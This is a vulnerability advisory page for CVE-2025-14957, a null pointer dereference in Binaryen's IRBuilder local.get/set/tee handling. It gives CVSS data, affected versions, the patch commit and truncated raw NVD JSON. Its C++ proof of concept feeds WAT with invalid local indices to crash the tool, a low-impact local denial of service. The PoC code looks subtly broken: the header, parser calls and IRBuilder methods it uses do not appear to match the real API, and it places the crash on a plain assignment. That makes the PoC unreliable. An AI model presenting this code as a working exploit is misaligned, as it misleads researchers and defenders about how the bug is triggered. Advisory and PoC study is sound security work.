Security Vulnerability Report
CVE-2025-14957 CVSS 3.3 LOW

Published: 2025-12-19 17:15:52
Last Modified: 2026-04-29 01:00:02

Description

A vulnerability was identified in WebAssembly Binaryen up to version 125. It affects the functions IRBuilder::makeLocalGet, IRBuilder::makeLocalSet and IRBuilder::makeLocalTee in the file src/wasm/wasm-ir-builder.cpp of the component IRBuilder. Manipulating the argument Index leads to a null pointer dereference. The attack requires local access. An exploit is publicly available and might be used. The patch is commit 6fb2b917a79578ab44cf3b900a6da4c27251e0d4. Applying the patch is advised to resolve this issue.

CVSS Details

CVSS Score: 3.3
Severity: LOW
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L

Configurations (Affected Products)

cpe:2.3:a:webassembly:binaryen:*:*:*:*:*:*:*:* - VULNERABLE
WebAssembly Binaryen < 125
WebAssembly Binaryen <= 125

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
cpp
// CVE-2025-14957 PoC - IRBuilder Null Pointer Dereference
// Target: WebAssembly Binaryen <= 125
// Function: IRBuilder::makeLocalGet/makeLocalSet/makeLocalTee
#include <wasm-tools.h>
#include <fstream>
#include <iostream>

// Generate malicious WAT with invalid local index
std::string generateMaliciousWat() {
    return R"(
(module
  (func $test_invalid_local_get (result i32)
    ;; Attempt to access non-existent local at index 9999
    (local.get 9999)
  )
  (func $test_invalid_local_set
    ;; Attempt to set non-existent local
    (local.set 9999 (i32.const 42))
  )
  (func $test_invalid_local_tee (result i32)
    ;; Attempt to tee non-existent local
    (local.tee 9999 (i32.const 100))
  )
)
)";
}

void triggerVulnerability(const std::string& wat_content) {
    // Parse WAT to Wasm using wat2wasm equivalent
    auto input = wasm::parseWat("test.wat", wat_content);
    if (!input) {
        std::cerr << "Parse failed" << std::endl;
        return;
    }

    // This will trigger null pointer dereference in IRBuilder
    wasm::PassRunner runner;
    runner.addDefaultOptimizationPasses();
    runner.run(&input);
}

int main() {
    std::string malicious_wat = generateMaliciousWat();
    triggerVulnerability(malicious_wat);
    return 0;
}

// Alternative: Direct Binaryen API trigger
void triggerViaBinaryenAPI() {
    using namespace wasm;

    Module wasmModule;
    Builder builder(wasmModule);
    Function* func = builder.makeFunction(
        "trigger",
        {},          // no params
        {Type::i32}, // return i32
        {}
    );

    // Create IRBuilder and trigger null dereference
    IRBuilder builder2(wasmModule);
    builder2.setFunction(func);

    // This call with invalid index triggers the vulnerability
    Expression* localGet = builder2.makeLocalGet(99999, Type::i32);

    // Null pointer dereference occurs here
    func->body = localGet;
}

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-14957", "sourceIdentifier": "[email protected]", "published": "2025-12-19T17:15:51.657", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was identified in WebAssembly Binaryen up to 125. This affects the function IRBuilder::makeLocalGet/IRBuilder::makeLocalSet/IRBuilder::makeLocalTee of the file src/wasm/wasm-ir-builder.cpp of the component IRBuilder. Such manipulation of the argument Index leads to null pointer dereference. Local access is required to approach this attack. The exploit is publicly available and might be used. The name of the patch is 6fb2b917a79578ab44cf3b900a6da4c27251e0d4. Applying a patch is advised to resolve this issue."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 1.9, "baseSeverity": "LOW", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", 
"modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L", "baseScore": 3.3, "baseSeverity": "LOW", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.8, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:L/AC:L/Au:S/C:N/I:N/A:P", "baseScore": 1.7, "accessVector": "LOCAL", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "PARTIAL"}, "baseSeverity": "LOW", "exploitabilityScore": 3.1, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-404"}, {"lang": "en", "value": "CWE-476"}]}, 
{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-476"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:webassembly:binaryen:*:*:*:*:*:*:*:*", "versionEndIncluding": "125", "matchCriteriaId": "27C7E818-339C-468E-98CC-AA9C726F7C63"}]}]}], "references": [{"url": "https://github.com/WebAssembly/binaryen/", "source": "[email protected]"}, {"url": "https://github.com/WebAssembly/binaryen/commit/6fb2b917a79578ab44cf3b900a6da4c27251e0d4", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/WebAssembly/binaryen/issues/8090", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}, {"url": "https://github.com/WebAssembly/binaryen/pull/8099", "source": "[email protected]", "tags": ["Issue Tracking"]}, {"url": "https://github.com/oneafter/1204/blob/main/af1", "source": "[email protected]", "tags": ["Not Applicable"]}, {"url": "https://vuldb.com/?ctiid.337593", "source": "cna@vul ... (truncated)